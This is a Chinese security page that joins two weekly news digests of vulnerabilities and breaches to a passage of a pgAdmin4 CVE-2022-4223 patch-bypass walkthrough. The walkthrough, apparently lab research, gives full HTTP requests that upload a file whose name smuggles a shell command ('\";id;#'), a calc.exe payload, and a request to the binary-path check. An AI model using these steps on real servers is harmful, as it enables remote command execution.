https://www.rapid7.com/blog/post/2024/06/11/etr-cve-2024-28995-trivially-exploitable-information-disclosure-vulnerability-in-solarwinds-serv-u/ 研究人员发现最近修补的一个影响SolarWinds Serv-U文件传输软件的高严重性漏洞正被野外威胁行为体积极利用。该漏洞编号为CVE-2024-28995（CVSS评分：8.6），属于目录横向迁移漏洞，可能允许攻击者读取主机上的敏感文件。该漏洞影响Serv-U 15.4.2 HF1之前的所有软件版本，该公 4、开源电商平台模块漏洞被利用窃取信用卡信息 https://security.friendsofpresta.org/modules/2024/06/18/pkfacebook.html 研究人员发现威胁行为体正在利用开源电子商务平台PrestaShop的Facebook高级模块（pkfacebook）中的漏洞，在易受攻击的电子商务网站上部署信用卡盗刷器，并窃取永余的支付信用卡的详细信息。PrestaShop是一个开源的电子商务平台，允许个人和企业创建和管理在线商店。截至2024年，全球约有300000家在线商店使用该平台。该严重漏洞编号为CVE-2024-36680，是 pkfacebook模块的facebookConnect.ph 5、新的 SnailLoad 攻击依靠网络延迟变化来猜测用户活动 https://www.securityweek.com/new-snailload-attack-relies-on-network-latency-variations-to-infer-user-activity/ 名为 SnailLoad 的新攻击允许远程攻击者无需直接访问网络流量即可猜测用户浏览的网站和视频。 6、LockBit称入侵了美国联邦储备银行窃取了33TB敏感数据 https://securityaffairs.com/164873/cyber-crime/lockbit-claims-hacked-us-federal-reserve.html Lockbit 勒索软件组织宣布已入侵美国联邦储备银行并窃取了 33 TB 的敏感数据。 7、Ollama AI 工具中发现严重远程代码执行漏洞 https://thehackernews.com/2024/06/critical-rce-vulnerability-discovered.html 该漏洞被追踪为 CVE-2024-37032 并被称为 Probllama，已在 2024 年 5 月 7 日发布的 0.1.34 版本中得到修补。Ollama 是一种用于在 Windows、Linux 和 macOS 设备上本地运行大型语言模型的服务。 8、谷歌推出 Naptime 项目，用于人工智能漏洞研究 https://thehackernews.com/2024/06/google-introduces-project-naptime-for.html 谷歌开发了一个名为Project Naptime的新框架，据称该框架可使大型语言模型 (LLM) 开展漏洞研究，旨在改进自动发现方法。 9、疑似 Kimsuky (APT-Q-2) 以军工招聘为饵攻击欧洲 https://www.secrss.com/articles/67272 近期奇安信威胁情报中心发现一批以美国军工企业在德国地区的招聘为诱饵的攻击样本，同时其他安全研究人员也对相关样本进行了公开披露 。 10、朱利安·阿桑奇将与美国达成协议承认指控 https://www.securityweek.com/wikileaks-founder-julian-assange-will-plead-guilty-in-deal-with-us-and-return-to-australia/ 维基解密创始人朱利安·阿桑奇将与美国司法部达成协议，承认一项重罪指控，美国司法部在提交给法庭的一封信中表示，阿桑奇定于在美国西太平洋联邦区马里亚纳群岛的联邦法院出庭，承认根据《间谍法》提出的密谋非法获取和传播机密国防信息的指控。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Mailcow开源邮件套件存在远程代码执行漏洞 https://www.sonarsource.com/blog/remote-code-execution-in-mailcow-always-sanitize-error-messages/ 研究人员披露了开源邮件服务器套件Mailcow存在的两个安全漏洞，威胁行为体可以利用这些漏洞在易受攻击的实例上执行任意代码。这两个安全漏洞影响2024年4月4日发布的Mailcow开源邮件服务器套件2024-04版之前的所有软件版本，攻击者可以利用漏洞通过使用特制的输入触发异常将恶意脚本注入管理面板，从而劫持会话并在管理员面板中执行特权操作。 2、T-Mobile称泄露数据源自于其第三方供应商 https://www.bleepingcomputer.com/news/security/t-mobile-denies-it-was-hacked-links-leaked-data-to-vendor-breach/ 名为IntelBroker的攻击组织声称已窃取并正在出售德国电信公司T-Mobile的数据，并在黑客论坛上发布了几个截图显示攻击者能够以管理权限访问Confluence服务器和公司内部供开发人员使用的Slack频道，威胁行为体将他们出售的数据内容描述为“源代码、SQL 文件、图像、Terraform数据、t-mobile.com认证、Siloprograms”。T-Mo 3、网络犯罪组织利用免费软件诱饵传播窃密软件 https://www.trellix.com/blogs/research/how-attackers-repackaged-a-threat-into-something-that-looked-benign/ 研究人员发现威胁行为者使用免费或盗版的商业软件作为诱饵攻击毫无戒心的用户，例如攻击者设法诱骗用户下载受密码保护的存档文件，其中包含了被木马感染的Cisco Webex Meetings应用程序，Cisco Webex Meetings应用程序会秘密加载隐秘的名为Hijack Loader的恶意软件加载程序，然后部署名为Vidar Stealer的信息窃取程序，甚至利用额外的有效载 4、新型Fickle窃密木马可绕过系统UAC防护 https://www.fortinet.com/blog/threat-research/fickle-stealer-distributed-via-multiple-attack-chain 研究人员披露一种名为Fickle Stealer的基于Rust语言的新型信息窃取恶意软件正通过多种攻击链进行传播，已发现四种不同的传播方法包括VBA投放器、VBA下载器、链接下载器和可执行下载器，其中一些使用PowerShell脚本绕过用户帐户控制(UAC)来执行Fickle Stealer。PowerShell脚本（如名为“bypass.ps1”或“u.ps1”）还会定期向攻击者控制的Teleg 5、高风险CosmicSting漏洞影数百万商务网站 https://sansec.io/research/cosmicsting CosmicSting（又名CVE-2024-34102）是两年来Magento和Adobe Commerce商店遭遇的最严重的漏洞，数百万个网站在“CosmicSting”漏洞安全更新发布九天后仍未得到修补，这使它们面临XML外部实体注入(XXE)和远程代码执行(RCE)的风险。漏洞允许任何人读取私人文件（例如带有密码的文件），结合Linux中最近的iconv错误可以组合实现远程代码执行。 6、研究人员发现影响多款英特尔CPU的UEFI漏洞 https://eclypsium.com/blog/ueficanhazbufferoverflow-widespread-impact-from-vulnerability-in-popular-pc-and-server-firmware 研究人员披露了影响多个系列的英特尔酷睿台式机和移动处理器，这些现已修复的安全漏洞存在于Phoenix SecureCore UEFI 固件中。UEFIcanhazbufferoverflow漏洞的编号为CVE-2024-0762（CVSS 评分：7.5），它被描述为一种缓冲区溢出的类型，源于在受信任平台模块 (TPM)配置中使用不安全变量可能导致执行 7、RansomHub勒索软件针对VMware ESXi虚拟机 https://www.recordedfuture.com/ransomhub-draws-in-affiliates-with-multi-os-capability-and-high-commission-rates RansomHub勒索软件于2024年2月开始活跃，其代码与组织成员与ALPHV/BlackCat和Knight 勒索软件有关联。由于可以更好地管理CPU、内存和存储资源，大量企业采用虚拟机来托管其服务器，研究人员近期发现RansomHub威胁组织在其武器库中还有一个专门针对VMware ESXi虚拟机Linux环境的变体，在加密完成后还会禁用系统日志和其他关键服务以阻碍 8、美国以国家安全风险理由封杀卡巴斯基软件 https://www.bis.gov/press-release/commerce-department-prohibits-russian-kaspersky-software-us-customers 美国商务部工业安全局（BIS）周四宣布了一项“史无前例”的禁令，禁止卡巴斯基实验室美国子公司直接或间接在该国提供其安全软件商业活动，封锁还扩展到该网络安全公司的附属公司、子公司和母公司。根据禁令，从7月20日起，卡巴斯基将被禁止向美国消费者和企业销售其软件。不过，该公司仍可在9月29日之前向现有客户提供软件和防病毒签名更新。 9、未修补漏洞允许冒充微软企业电子邮件账户 https://securityaffairs.com/164675/hacking/expert-warns-of-a-spoofing-bug.html 研究人员Vsevolod Kokorin（@Slonser）发现漏洞允许攻击者冒充微软公司电子邮件帐户并发起网络钓鱼攻击，并已向微软报告了该漏洞，但微软公司回复称无法重现他的发现。随后该研究人员在X上公开了的这一漏洞，但并未透露该漏洞的技术细节，以防止恶意黑客利用它。目前该问题尚未得到解决，并且尚不清楚是否有威胁行为体已在野外攻击中利用该漏洞。 10、黑客组织窃取埃森哲企业3万员工数据 https://hackread.com/hacker-leaks-accenture-employees-data-breach/ 代号为“888”的黑客组织最近泄露了一份文件包含埃森哲32828名现任和前任员工个人联系方式与信息。埃森哲企业总部位于爱尔兰都柏林，是一家全球专业服务公司，专门从事IT服务和咨询，业务遍及120多个国家。2024年6月19日星期三，这些数据被发布在臭名昭著的黑客论坛Breach Forums上，此次泄露事件中没有涉及用户的密码凭证，黑客组织声称这些数据是在一次涉及埃森哲第三方合作公司的入侵中获得的。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

我们可以看到针对于漏洞 CVE-2022-4223，官方做了一定的修复措施。 web\pgadmin\misc__init__.py#validate_binary_path 首先是添加了 @login_required 进行权限校验。在 Flask 框架中，@login_required 装饰器通常与 Flask-Login 扩展一起使用。Flask-Login 提供了简单而强大的用户身份验证功能，其中包括 @login_required 装饰器用于保护需要登录用户才能访问的视图。当在一个函数、方法或类上应用 @login_required 装饰器时，它会检查当前用户是否已经登录。如果用户未登录，则会将其重定向到登录页面或返回相应的错误信息，而不允许访问被装饰的代码块。 添加了权限校验之后，这个漏洞就从未授权的前台漏洞，转换为需要登录的后台漏洞了。 同时对传入的路径进行校验，通过 os.path.exists 来判断是否存在。 linux 我们发现会对传入的路径进行校验的，那么在linux 下，我们可以通过在服务器上上传一个包含恶意文件名的文件，来进行绕过。 可以从 docker hub 上搜索 docker 资源 https://hub.docker.com/search?q=pgadmindocker pull dpage/pgadmin4:7.6 docker run -e 'PGADMIN_DEFAULT_EMAIL=test@example.com' -e 'PGADMIN_DEFAULT_PASSWORD=123456'  -p 5050:80 --name pgadmin -d  docker.io/dpage/pgadmin4:7.6 登录后台工具->存储管理器 上传一个包含恶意文件名的文件 POST /file_manager/filemanager/3395111/ HTTP/1.1 Host: 127.0.0.1:5050 Content-Length: 491 X-pgA-CSRFToken: ImE3NDYzOGJhOWYxNDIzY2QzZDUwNTI3MWMzOGU4NGNhMmNhNzkzYTQi.Zi8ctA._DuZsbw2SE05kwuVkqgG7Y-KsjE Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryihDQGI2B09k9alLf Origin: http://127.0.0.1:5050 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://127.0.0.1:5050/browser/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: pga4_session=2397843f-fbe6-4481-947e-e30f73c6a0ee!GPxXiZuTJzjVn+sk6vhlLNAmjhQr6xIY0yumFSIGBAQ=; PGADMIN_LANGUAGE=zh Connection: close ------WebKitFormBoundaryihDQGI2B09k9alLf Content-Disposition: form-data; name="newfile"; filename="\";id;#" Content-Type: text/plain 123 ------WebKitFormBoundaryihDQGI2B09k9alLf Content-Disposition: form-data; name="mode" add ------WebKitFormBoundaryihDQGI2B09k9alLf Content-Disposition: form-data; name="currentpath" / ------WebKitFormBoundaryihDQGI2B09k9alLf Content-Disposition: form-data; name="storage_folder" my_storage ------WebKitFormBoundaryihDQGI2B09k9alLf-- 同时可以得到在文件在服务器上的路径 打开文件->配置 路径->二进制路径->填入恶意文件的位置 点击运行 windows 下载软件并进行安装 https://ftp.postgresql.org/pub/pgadmin/pgadmin4/v6.21/windows/pgadmin4-6.21-x64.exe需要把C:\Users\username\AppData\Local\Programs\pgAdmin 4\v5\web 下的config.py 修改 DEFAULT_SERVER \= '0.0.0.0' 因为windows 无法利用拼接来执行命令，所以还是要想办法成功加载文件才行。 import os binary_path = "\\\\192.168.222.128\\TMP\\" UTILITIES_ARRAY = ['pg_dump', 'pg_dumpall', 'pg_restore', 'psql'] for utility in UTILITIES_ARRAY:    full_path = os.path.abspath(        os.path.join(binary_path, (utility if os.name != 'nt' else (utility + '.exe')))   )    print(full_path)    print(os.path.exists(full_path)) windows 不能再利用共享资源来实现，所以也构造一个exe 上传并执行。 编译恶意的exe文件并放到上传 pip install pyinstaller type execute_calc.py import subprocess def execute_calc():    subprocess.call("calc.exe") if __name__ == "__main__":    execute_calc() pyinstaller --onefile execute_calc.py 和linux启动有所不同 Tools->import 成功将恶意文件上传到服务器上。 同时构造请求数据包 POST /misc/validate_binary_path HTTP/1.1 Host: 192.168.222.145:5050 X-pgA-CSRFToken: IjU4MzQ0OTM2Yzc3YzM5ZmE5Yjg0MjRhODVlNzkzZjM5MTViZDBmNzki.Zi9GcQ.pGwCjLqPq3fNzohIRNerpipIRK8 Accept: application/json, text/plain, */* User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Origin: http://192.168.222.145:5050 Referer: http://192.168.222.145:5050/browser/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: pga4_session=e6f521fc-e9f4-4c58-bf0a-e9abafb4ceb5!JG7fBzRT4FkugKb175t9vWdZpKmAtnbo0d/oPzcAbFI=; PGADMIN_LANGUAGE=en Connection: close Content-Type: application/json Content-Length: 39 {"utility_path":"C:\\Users\\whippet\\"} 可能是因为本地测试的原因，后来尝试的时候发现，本地去调用共享文件时，可以接收到请求，但是很快就断开连接，所以最后的结果是 False。 所以环境为windwos 时可以利用共享资源来绕过 os.path.exists(）的检测。